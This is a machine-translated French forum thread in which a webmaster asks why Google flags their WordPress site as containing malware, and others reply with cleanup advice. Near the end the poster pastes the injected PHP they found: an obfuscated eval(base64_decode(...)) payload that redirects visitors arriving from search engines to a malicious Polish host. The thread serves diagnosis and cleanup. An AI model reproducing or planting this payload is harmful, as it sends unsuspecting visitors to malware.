web-dev-qa-db-fra.com

Google dit que mon site contient des logiciels malveillants

mon site de clients http://bit.ly/dTOfGF (j'ai utilisé le raccourcisseur d'URL).

J'ai tout essayé pour trouver le malware, mais je ne pouvais pas.

J'ai essayé la liste de contrôle Google http://googlewebmastercentral.blogspot.com/2007/09/quick-security-checklist-for-webmasters.html

j'ai vérifié tous les fichiers de script dans plusieurs navigateurs et je n'ai trouvé aucun ...

Chose étrange, Google rapporte que les fichiers png et 1 css contiennent des logiciels malveillants ...

Toute aide serait appréciée.

Merci!

hackingmalware
4
Karington

Il est plus que probable que votre installation de WordPress a été compromise.

La solution permanente consiste à suivre ces étapes pour s’assurer qu’il est complètement nettoyé et pour éviter une récurrence. C’est la meilleure méthode pour s’assurer qu’il est propre à 100%.

  1. Sauvegarder la base de données
  2. Notez les personnalisations, telles que les plugins ou toute autre modification apportée.
  3. Supprimez tous les fichiers du site. Assurez-vous de sauvegarder tout ce qui ne fait pas partie de WordPress!
  4. Réinstaller WordPress
  5. Restaurer la base de données
  6. Vérifiez que les utilisateurs WordPress sont corrects et autorisés
  7. Réinstallez tous les plugins que vous utilisiez
  8. Rechargez tous les fichiers .php supplémentaires à partir d'une copie vierge connue

C’est la meilleure façon de s’assurer que le site n’a pas été attaqué auparavant et qu’il a caché des portes dérobées profondément enfoncées dans le site.

Il est extrêmement important de maintenir votre logiciel WordPress à jour et d'utiliser des mots de passe forts pour votre WP admin, FTP et base de données, et de ne pas utiliser le même mot de passe pour toutes les applications. leur.

Informations complémentaires: étude de cas GoDaddy

3
Mike Hudson

Refaites ces images, peut-être même en utilisant des captures d'écran, ré-enregistrez-les et remplacez-les sur votre site. Tous les logiciels malveillants cachés en eux seront supprimés de cette façon.

Mise à jour

Cet extrait de code contenait du code qui, si un utilisateur trouvait votre site par le biais de Google, Yahoo ou Bing search, redirigeait les utilisateurs vers un site polonais qui contient une fausse page de recherche et tente de charger un logiciel malveillant sur son ordinateur.

1
John Conde

C'était dans un fichier php contenant chmod 666

eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cgp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRocnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbS FRU UF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));

Il a seulement montré quand il a été visité via Google yahoo ou bing, donc je ne pouvais pas voir le malware ...

1
Karington